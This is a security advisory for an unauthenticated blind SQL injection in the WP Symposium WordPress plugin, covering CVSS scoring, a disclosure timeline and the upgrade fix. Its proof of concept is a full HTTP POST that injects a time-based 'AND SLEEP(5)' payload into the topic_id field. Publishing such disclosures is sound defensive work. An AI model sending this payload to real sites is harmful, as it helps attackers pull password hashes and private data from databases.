Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data


Last revised:

An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.4 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity None
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:

POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0


Advisory timeline

2015-03-02: Discovered
2015-07-14: Reported to
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published

Mitigation/further actions

Upgrade to version 15.8 or later